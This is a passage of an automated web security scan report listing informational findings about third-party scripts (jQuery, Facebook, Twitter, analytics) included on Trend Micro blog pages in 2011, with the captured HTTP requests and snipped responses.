When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


13.1. http://blog.trendmicro.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?p=12640 HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/search/?q=xss&search.x=2&search.y=10&search=search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://blog.trendmicro.com/12640>; rel=shortlink
Link: <http://blog.trendmicro.com/?p=12640>; rel=shortlink
X-Varnish: 1696291508
Content-Length: 55144
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:26 GMT
Date: Tue, 06 Sep 2011 18:16:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</div>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"

type="text/javascript">


</script>
...[SNIP]...
</a>
        <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.2. http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /a-snapshot-of-android-threats-infographic/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /a-snapshot-of-android-threats-infographic/ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/?p=12640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.1.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=1; bn_u=6923713914570485926; CMAVID=50021315153052143970353; cmRS=&t1=1315350993766&t2=-1&t3=1315350994638&lti=1315350994637&ln=&hr=/a-snapshot-of-android-threats-infographic/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/%3Fp%3D12640&rf=http%3A//us.trendmicro.com/us/search/%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22t%22%3A1315350994642%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fa-snapshot-of-android-threats-infographic%2F%22%2C%22l%22%3A%22A%20Snapshot%20of%20Android%20Threats%20%5BINFOGRAPHIC%5D%22%2C%22de%22%3A%7B%22su%22%3A%22XSS%20(Cross-Site%20Scripting)%20Very%20Much%20Alive%20and%20Kicking%20We%20were%20about%20to%20investigate%20further%20on%20malicious%20activities%20related%20to%20banner82(dot)com%2Fb.js%20but%20the%22%2C%22ti%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22nw%22%3A1098%2C%22nl%22%3A107%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://blog.trendmicro.com/36257>; rel=shortlink
Link: <http://blog.trendmicro.com/?p=36257>; rel=shortlink
X-Varnish: 1696291652
Content-Length: 57514
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:33 GMT
Date: Tue, 06 Sep 2011 18:16:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</div>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"

type="text/javascript">


</script>
...[SNIP]...
</a>
        <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- event tracking for this event is off --><script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.3. http://blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /blackhat-2011-dangers-of-embedded-web-servers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blackhat-2011-dangers-of-embedded-web-servers/ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/?s=xss&Submit=+Go+
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.4.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=4; bn_u=6923713914570485926; cmRS=&t1=1315351014612&t2=-1&t3=1315351015662&t4=1315351013744&lti=1315351015662&ln=&hr=/blackhat-2011-dangers-of-embedded-web-servers/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/%3Fs%3Dxss%26Submit%3D+Go+&rf=http%3A//blog.trendmicro.com/category/exploits/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fs%3Dxss%26Submit%3D%2BGo%2B%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22t%22%3A1315351015665%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fblackhat-2011-dangers-of-embedded-web-servers%2F%22%2C%22l%22%3A%22Blackhat%202011%3A%20Dangers%20of%20Embedded%20Web%20Servers%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20results%20for%3A%20Xss%20%7C%20TrendLabs%20%7C%20Malware%20Blog%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A513%2C%22nl%22%3A120%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://blog.trendmicro.com/36136>; rel=shortlink
Link: <http://blog.trendmicro.com/?p=36136>; rel=shortlink
X-Varnish: 1696292094
Content-Length: 54989
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:53 GMT
Date: Tue, 06 Sep 2011 18:16:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</div>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"

type="text/javascript">


</script>
...[SNIP]...
</a>
        <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- event tracking for this event is off --><script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.4. http://blog.trendmicro.com/category/exploits/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /category/exploits/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/exploits/ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.2.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=2; bn_u=6923713914570485926; cmRS=&t1=1315350998493&t2=1315351000572&t3=1315351002621&t4=1315350994638&lti=1315351002613&ln=&hr=/category/exploits/&fti=&fn=UNDEFINED%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/a-snapshot-of-android-threats-infographic/&rf=http%3A//blog.trendmicro.com/%3Fp%3D12640; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fa-snapshot-of-android-threats-infographic%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22t%22%3A1315351002628%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22l%22%3A%22Exploits%22%2C%22de%22%3A%7B%22su%22%3A%22In%20January%20this%20year%2C%20Trend%20Micro%20chairman%20and%20co-founder%20Steve%20Chang%20was%20quoted%20as%20saying%20that%20Android-based%20devices%20are%20less%20secure%20than%20those%20running%20on%20iOS.%22%2C%22ti%22%3A%22A%20Snapshot%20of%20Android%20Threats%20%5BINFOGRAPHIC%5D%20%7C%20Malware%20Blog%20%7C%20Trend%20Micro%22%2C%22nw%22%3A813%2C%22nl%22%3A120%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
X-Varnish: 1696291820
Content-Length: 61429
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:40 GMT
Date: Tue, 06 Sep 2011 18:16:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.5. http://blog.trendmicro.com/category/pharming/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /category/pharming/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/pharming/ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.8.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=8; bn_u=6923713914570485926; cmRS=&t1=1315351074117&t2=1315351076030&t3=1315351267076&t4=1315351071147&lti=1315351267076&ln=&hr=/category/pharming/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/&rf=http%3A//blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
X-Varnish: 1696295149
Content-Length: 61490
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:21:03 GMT
Date: Tue, 06 Sep 2011 18:21:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.6. http://blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /trend-micro-researchers-identify-vulnerability-in-hotmail/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /trend-micro-researchers-identify-vulnerability-in-hotmail/ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/category/exploits/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.6.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=6; bn_u=6923713914570485926; cmRS=&t1=1315351031684&t2=1315351033496&t3=1315351039900&t4=1315351030127&lti=1315351039899&ln=&hr=/trend-micro-researchers-identify-vulnerability-in-hotmail/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/category/exploits/&rf=http%3A//blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fblackhat-2011-dangers-of-embedded-web-servers%2F%22%2C%22t%22%3A1315351039907%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22de%22%3A%7B%22ti%22%3A%22Exploits%20%7C%20TrendLabs%20%7C%20Malware%20Blog%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A910%2C%22nl%22%3A117%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://blog.trendmicro.com/34090>; rel=shortlink
Link: <http://blog.trendmicro.com/?p=34090>; rel=shortlink
X-Varnish: 1696292645
Content-Length: 59377
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:17:17 GMT
Date: Tue, 06 Sep 2011 18:17:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</div>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"

type="text/javascript">


</script>
...[SNIP]...
</a>
        <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.7. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /wp-content/plugins/flash-gallery/js/addOnLoad.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/plugins/flash-gallery/js/addOnLoad.js?ver=1 HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/?p=12640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 02 Dec 2010 03:50:59 GMT
ETag: "18c4d1-2c1-49665546aeec0"
